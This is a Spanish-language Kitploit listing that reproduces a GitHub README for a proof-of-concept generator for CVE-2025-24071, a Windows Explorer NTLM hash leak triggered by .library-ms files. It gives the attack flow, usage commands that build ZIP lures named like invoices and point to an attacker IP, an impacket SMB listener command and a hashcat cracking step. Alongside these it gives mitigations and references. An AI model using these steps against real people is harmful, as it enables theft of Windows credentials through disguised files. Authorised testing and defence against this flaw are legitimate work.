Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24071 — Generador de PoC en Python sin dependencias para CVE-2025-24071 que crea un archivo .library-ms malicioso en un ZIP para desencadenar la divulgación del hash NTLM de Windows Explorer. | Kitploit
Herramientas/GitHubGitHub/bardlaudian/cve-2025-24071
Herramientas de PhishingAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónMovimiento LateralRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubbardlaudian/cve-2025-24071

CVE-2025-24071

Generador de PoC en Python sin dependencias para CVE-2025-24071 que crea un archivo .library-ms malicioso en un ZIP para desencadenar la divulgación del hash NTLM de Windows Explorer.

Ver Repositorio
1hace 2 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24071 — Suplantación de Windows File Explorer / Divulgación de hash NTLM mediante .library-ms

Python CVE Platform

⚠️ Aviso legal: Esta herramienta está destinada únicamente a fines educativos y a pruebas de penetración autorizadas. Úsala solo contra sistemas que poseas o para los que tengas permiso explícito por escrito para probar. El uso no autorizado es ilegal.


Tabla de contenidos

  • Descripción general
  • Detalles de la vulnerabilidad
  • Cómo funciona
  • Requisitos
  • Instalación
  • Uso
  • Ejemplos
  • Mitigaciones
  • Créditos
  • Referencias

Descripción general

Windows File Explorer analiza automáticamente ciertos tipos de archivo en cuanto aparecen en la vista de una carpeta, sin ninguna interacción del usuario como hacer doble clic. Las versiones afectadas no validan correctamente los archivos .library-ms, que pueden definir un conector de búsqueda que apunta a una ruta SMB remota arbitraria.

Cuando Explorer muestra una carpeta que contiene un archivo .library-ms malicioso (por ejemplo, justo después de extraer un archivo ZIP/RAR), intenta silenciosamente conectarse a la ruta UNC controlada por el atacante para resolver la ubicación de la "biblioteca". Este intento de conexión SMB transporta el hash NetNTLMv2 de la víctima, que un atacante que capture el tráfico en el host especificado (por ejemplo, con impacket-smbserver o Responder) puede intentar crackear offline o relayar.

Este repositorio contiene una reescritura mínima y sin dependencias de un generador de PoC público para esta vulnerabilidad: construye el archivo .library-ms malicioso y lo empaqueta en un ZIP, usando únicamente la biblioteca estándar de Python.


Detalles de la vulnerabilidad


Cómo funciona

Un archivo .library-ms es un documento XML que indica a Windows Explorer que muestre el contenido de una ubicación remota o local como una "biblioteca". Su elemento <simpleLocation><url> puede apuntar a una ruta UNC (\\<host>\<share>).

En las versiones afectadas, Explorer resuelve esta ubicación en cuanto se muestra la carpeta — no se requiere hacer doble clic ni ninguna acción explícita más allá de tener el archivo visible en la vista de una carpeta (por ejemplo, justo después de extraer un archivo que lo contiene).

Requisitos del ataque

  1. El atacante controla un host accesible por la víctima (o está en la misma red) ejecutando un listener SMB (impacket-smbserver, Responder, etc.).
  2. Se genera un archivo .library-ms malicioso, apuntando a \\<attacker_ip>\<share>.
  3. El archivo se entrega a la víctima, normalmente empaquetado dentro de un archivo ZIP/RAR (este repositorio automatiza ese paso de empaquetado).
  4. La víctima extrae el archivo y ve la carpeta en Explorer — no se necesita más interacción.

Flujo de explotación

root@kitploit:~
1. Start an SMB listener on the attacker machine
2. Generate a .library-ms file pointing to \\<attacker_ip>\<share>
3. Package it into a ZIP archive
4. Deliver the ZIP to the victim (upload feature, email, share, etc.)
5. Victim extracts the ZIP and Explorer renders the folder
6. Explorer resolves the UNC path -> SMB auth attempt -> NetNTLMv2 hash captured
7. Crack the hash offline (hashcat -m 5600) or relay it

Requisitos

  • Python 3.8+ (solo biblioteca estándar — os, sys, argparse, zipfile)

No se necesitan dependencias de terceros para generar el payload. Capturar el hash requiere un listener SMB como Impacket (impacket-smbserver) o Responder en el lado del atacante.


Instalación

root@kitploit:~
git clone https://github.com/BardLaudian/CVE-2025-24071.git
cd CVE-2025-24071

Uso

root@kitploit:~
usage: cve_2025_24071.py [-h] [-n NAME] [-i IP] [-s SHARE] [-o OUTDIR] [-a]

options:
  -n NAME, --name NAME             Output base filename (no extension)
  -i IP, --ip IP                   Attacker IP to embed as the UNC path target
  -s SHARE, --share SHARE          Share name (default: shared)
  -o OUTDIR, --outdir OUTDIR       Output directory (default: current dir)
  -a, --affected-versions          Print the list of affected Windows versions and exit

Ejemplos

Uso básico

root@kitploit:~
python3 cve_2025_24071.py -n invoice -i 10.10.14.5

Esto produce invoice.zip, que contiene invoice.library-ms apuntando a \\10.10.14.5\shared.

Iniciar el listener antes de entregar el archivo

root@kitploit:~
impacket-smbserver shared /tmp/smbshare -smb2support

Nombre de recurso compartido y directorio de salida personalizados

root@kitploit:~
python3 cve_2025_24071.py -n report -i 10.10.14.5 -s data -o ./payloads

Listar versiones afectadas

root@kitploit:~
python3 cve_2025_24071.py -a

Mitigaciones

  • Aplicar la actualización de seguridad acumulativa de marzo de 2025 (o posterior) para tu versión de Windows.
  • Restringir SMB saliente (TCP 445) en el perímetro de la red para evitar que los hashes NTLM se filtren a hosts externos.
  • Aplicar la firma SMB y deshabilitar NTLM cuando sea posible en favor de Kerberos.
  • Escanear los archivos subidos/extraídos en busca de .library-ms y tipos de archivo similares que se analizan automáticamente antes de que lleguen a las estaciones de trabajo de los usuarios finales.

Créditos

  • Vulnerabilidad descubierta y reportada a Microsoft por: Microsoft (acreditada a través de MSRC; el reportante externo original no se divulgó públicamente en el momento de redacción)
  • Aviso publicado por: Microsoft Security Response Center (MSRC)
  • Concepto de generador de PoC público referenciado de: ThemeHackers
  • Reescritura con biblioteca estándar: Bardlaudian — versión sin dependencias del generador de ZIP/.library-ms, sin nueva técnica de explotación

Referencias

  • MSRC — Guía de actualización de seguridad de CVE-2025-24071
  • NVD — CVE-2025-24071
  • Registro de CVE.org — CVE-2025-24071
  • GitHub Advisory Database — GHSA-mppc-8qxh-4wjw
Descargar herramienta
CampoValor
CVECVE-2025-24071
AfectadosWindows 10 (1607–22H2), Windows 11 (22H2–24H2), Windows Server 2012 R2 – 2025
TipoExposición de información sensible a un actor no autorizado (CWE-200)
PrivilegiosNinguno (atacante no autenticado; requiere que la víctima vea/extraiga el archivo)
ImpactoDivulgación del hash NetNTLMv2 → cracking offline o relay NTLM
CVSS7.5 Alto (según GitHub Advisory Database) / 6.5 (base MSRC)
ParcheActualizaciones acumulativas del Patch Tuesday de marzo de 2025